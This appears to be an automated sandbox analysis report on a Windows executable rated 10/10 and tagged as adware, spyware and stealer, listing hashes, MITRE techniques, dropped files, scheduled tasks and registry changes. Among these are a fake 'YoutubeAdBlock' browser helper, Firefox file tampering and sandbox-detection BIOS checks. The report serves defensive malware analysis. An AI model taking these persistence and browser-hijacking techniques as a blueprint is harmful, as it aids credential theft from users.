6495e9cc59844c804022b026aff88b0afaaafe6a23702231eaee3e1d74d448ef

Analysis

max time kernel
123s
max time network
118s
platform
windows10_x64
resource
win10v20210408
submitted
21-06-2021 07:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

044dddee4308c73a3d6d7cb710f209d4.exe
Size

6.2MB
MD5

044dddee4308c73a3d6d7cb710f209d4
SHA1

875f991fb85660b34f738d76da5a28e3c26ff62b
SHA256

6495e9cc59844c804022b026aff88b0afaaafe6a23702231eaee3e1d74d448ef
SHA512

d4fdfcb2b7401836c4e8600372c129d2d556d57f3ec5463d44f646fa7ebf236370c6bb71fa0bd0131f0ade4dedd10528f53ba541db4ec82b46d1ad36b7d2277a

Score

10^/10

adware discovery persistence spyware stealer

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

18 2104 rundll32.exe
Executes dropped EXE 5 IoCs

Processes:

SimplInst.exeSimplInst.exeHvCBxel.exeHrhavpK.exeoqNVXZi.exe

pid process

3788 SimplInst.exe
904 SimplInst.exe
2192 HvCBxel.exe
4016 HrhavpK.exe
3604 oqNVXZi.exe

flow	pid	process
18	2104	rundll32.exe

pid	process
3788	SimplInst.exe
904	SimplInst.exe
2192	HvCBxel.exe
4016	HrhavpK.exe
3604	oqNVXZi.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SimplInst.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2104 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Drops desktop.ini file(s) 1 IoCs

Processes:

HrhavpK.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini HrhavpK.exe
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

pid	process
2104	rundll32.exe

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	HrhavpK.exe

Drops file in System32 directory 17 IoCs

Processes:

SimplInst.exepowershell.exeHvCBxel.exepowershell.exerundll32.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	SimplInst.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	HvCBxel.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	HvCBxel.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	rundll32.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	rundll32.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	rundll32.exe

Drops file in Program Files directory 64 IoCs

Processes:

HrhavpK.exe

description	ioc	process
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ca\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hr\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\it\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ko\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\ELOJFuMDhuHU2\jVlYqfqjjPKSr.dll	HrhavpK.exe
File created	C:\Program Files (x86)\ELOJFuMDhuHU2\WYMtWzg.xml	HrhavpK.exe
File created	C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\NhWDtNq.dll	HrhavpK.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ms\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\anjFGKdzU\gMqHwmC.xml	HrhavpK.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\PJTHkPM.xml	HrhavpK.exe
File created	C:\Program Files (x86)\fcsvEsvhbcUn\CabyahI.dll	HrhavpK.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	HrhavpK.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\el\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\nl\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\tgZBuA7n.dll	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pt_BR\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\th\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\vTkUehy.xml	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\background.html	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mr\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\anjFGKdzU\VYfjPS.dll	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\icon16.ico	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en_US\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fi\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\he\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sk\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\uk\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\Z29V4M.dll	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\zh_TW\messages.json	HrhavpK.exe
File opened for modification	C:\Program Files (x86)\WSPNEpLqQIE\files\Kernel.js	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\id\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\kn\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sl\messages.json	HrhavpK.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{26DD0370-0637-483E-9309-99C42DDB0F66}.xpi	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\am\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en_GB\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\lv\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ml\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\no\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\pl\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ru\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sw\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\VDVkohm.exe	HrhavpK.exe
File created	C:\Program Files (x86)\pQmgloyPupxgC\DHsOiuQ.dll	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\de\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\en\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\es\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\fa\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ja\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\mk\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sv\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\tr\messages.json	HrhavpK.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\be\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\cs\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\et\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\hi\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\lt\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\sr\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\files\_locales\ta\messages.json	HrhavpK.exe
File created	C:\Program Files (x86)\WSPNEpLqQIE\ktTXGKPDP.dll	HrhavpK.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\wNQepEmyQbhZnWiRT.job	schtasks.exe
File created	C:\Windows\Tasks\bqZkKdgiyjBiVwZYfn.job	schtasks.exe
File created	C:\Windows\Tasks\jrzNdZzegeVMzeqYf.job	schtasks.exe
File created	C:\Windows\Tasks\JRajWlGIFNTafba.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3232	schtasks.exe
2184	schtasks.exe
3356	schtasks.exe
3852	schtasks.exe
3860	schtasks.exe
1920	schtasks.exe
3780	schtasks.exe
2840	schtasks.exe
2276	schtasks.exe
1872	schtasks.exe
2840	schtasks.exe
1208	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exeSimplInst.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SimplInst.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	SimplInst.exe

Modifies Internet Explorer settings 1 TTPs 15 IoCs

adware spyware

Modify Registry

T1112

Processes:

HrhavpK.exeoqNVXZi.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	HrhavpK.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	HrhavpK.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppPath = "C:\\Program Files (x86)\\WSPNEpLqQIE"	HrhavpK.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Approved Extensions	HrhavpK.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights	HrhavpK.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	HrhavpK.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "VDVkohm.exe"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\AppName = "VDVkohm.exe"	HrhavpK.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\VDVkohm.exe = "9999"	HrhavpK.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}	HrhavpK.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Policy = "3"	HrhavpK.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{1A4355C3-1380-4565-8F0B-AE992134C31B} = 51667a6c4c1d3b1bd34a540ab345020f9b00e4d923778200	HrhavpK.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	oqNVXZi.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	oqNVXZi.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeHrhavpK.exepowershell.exeHvCBxel.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d05cfc4a-0000-0000-0000-500600000000}\NukeOnDelete = "0"	HrhavpK.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "5"	HrhavpK.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d05cfc4a-0000-0000-0000-500600000000}	HrhavpK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	HvCBxel.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe

Modifies registry class 64 IoCs

Processes:

HrhavpK.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\VDVkohm.exe"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\VDVkohm.exe"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\WSPNEpLqQIE"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IyFOGQOPsSrjKINQhDMF"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\tgZBuA7n.dll"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\Programmable	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\FLAGS	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	HrhavpK.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}	HrhavpK.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	HrhavpK.exe
